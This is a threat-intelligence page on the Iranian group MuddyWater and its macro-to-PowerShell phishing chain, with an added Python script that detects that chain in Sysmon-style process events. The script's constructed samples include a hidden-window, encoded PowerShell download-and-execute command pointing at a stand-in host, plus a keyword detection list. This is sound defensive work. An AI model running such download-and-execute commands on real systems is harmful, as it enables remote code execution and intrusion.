MuddyWater, also known as SeedWorm and TEMP.Zagros, is an Iranian-backed cyber-espionage group and a relatively new APT (advanced persistent threat), first identified in 2017. It has usually targeted Middle Eastern nations, but has recently broadened its focus to include US government agencies, the military, SCADA and ICS operators, and IT firms. An attack typically begins with a phishing email that uses social engineering to persuade the recipient to open the attachment and enable macros. The macro drops a PowerShell-based Trojan, most recently version 3 of the POWERSTATS backdoor. Another TTP (tactics, techniques, and procedures) MuddyWater has recently been observed using is bundling a number of anti-detection tools into the attack chain to evade security products.
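The execution chain described above (Office document, enabled macro, PowerShell Trojan) leaves a distinctive trace in process-creation telemetry: an Office application as the parent of a script host, usually with an encoded or hidden-window command line. The script below is an added example written for this page; it is not code from the original article or from any of the reports listed under Technical details and Reporting. It assumes Sysmon Event ID 1 style field names (Image, ParentImage, CommandLine), and the sample events it runs over are constructed for the example, with an invented example.invalid host standing in for a real second-stage server.

```python
"""Added example, not from the original page or the cited reports: flag the
Office -> script-host chain used by the MuddyWater phishing lure and decode
any -EncodedCommand payload so keyword checks see the real script.
Field names follow Sysmon Event ID 1; the events are constructed."""
import base64
import json
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
# (label, pattern) pairs checked against the command line AND the decoded payload
KEYWORDS = [
    ("iex", r"\biex\b"),
    ("invoke-expression", r"invoke-expression"),
    ("downloadstring", r"downloadstring"),
    ("frombase64string", r"frombase64string"),
    ("hidden_window", r"-w(?:indowstyle)?\s+hidden"),
    ("noprofile", r"-nop(?:rofile)?\b"),
]


def _basename(path):
    """Lower-cased file name from a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _is_encoded_flag(token):
    """powershell.exe accepts any unambiguous prefix of -EncodedCommand
    (-e, -ec, -enc, ...), so match prefixes rather than one spelling."""
    t = token.lower().lstrip("-/")
    return t.startswith("e") and "encodedcommand".startswith(t)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -EncodedCommand, or None."""
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        if _is_encoded_flag(flag):
            try:
                raw = base64.b64decode(value.strip("\"'"), validate=True)
                return raw.decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None  # flag present but payload is not a valid encoded command
    return None


def score_event(event):
    """Return {'reasons': [...], 'decoded': str|None}; empty reasons = clean."""
    parent = _basename(event.get("ParentImage", ""))
    image = _basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    reasons = []
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        reasons.append(f"office_spawned_script_host:{parent}->{image}")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded_command")
    haystack = cmdline.lower() + "\n" + (decoded or "").lower()
    for label, pattern in KEYWORDS:
        if re.search(pattern, haystack):
            reasons.append(f"keyword:{label}")
    return {"reasons": reasons, "decoded": decoded}


def analyze(jsonl_text):
    """Parse one JSON event per line and return the flagged ones."""
    flagged = []
    for line in jsonl_text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        verdict = score_event(event)
        if verdict["reasons"]:
            flagged.append({"ProcessId": event.get("ProcessId"), **verdict})
    return flagged


# Constructed sample events (invented paths, PIDs and stage-2 URL).
_STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
_B64 = base64.b64encode(_STAGE2.encode("utf-16-le")).decode("ascii")
_WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"ProcessId": 4120, "ParentImage": r"C:\Windows\explorer.exe", "Image": _WINWORD,
     "CommandLine": f'"{_WINWORD}" /n "C:\\Users\\alice\\Downloads\\invoice.doc"'},
    {"ProcessId": 4188, "ParentImage": _WINWORD, "Image": _PS,
     "CommandLine": f"powershell.exe -nop -w hidden -enc {_B64}"},
    {"ProcessId": 5020, "ParentImage": r"C:\Windows\explorer.exe", "Image": _PS,
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"ProcessId": 5104, "ParentImage": _WINWORD, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c "powershell -ep Bypass -File %TEMP%\run.ps1"'},
])

if __name__ == "__main__":
    for hit in analyze(SAMPLE_EVENTS):
        print(hit["ProcessId"], ", ".join(hit["reasons"]))
```

Two design points matter in practice. The parent/child rule is kept separate from the keyword rules so that a macro that launches cmd.exe first (event 5104) is still caught even though its command line contains nothing that looks like PowerShell obfuscation, while an administrator running a plain script from Explorer (event 5020) is not flagged. And the encoded payload is decoded before keyword matching, because the whole point of -EncodedCommand in a lure is to keep strings such as DownloadString out of the visible command line.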

Technical details and Reporting

MuddyWater Updates POWERSTATS Backdoor For Multi-Stage Attacks

MuddyWater Hacking Group Upgrades Arsenal to Avoid Detection

Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign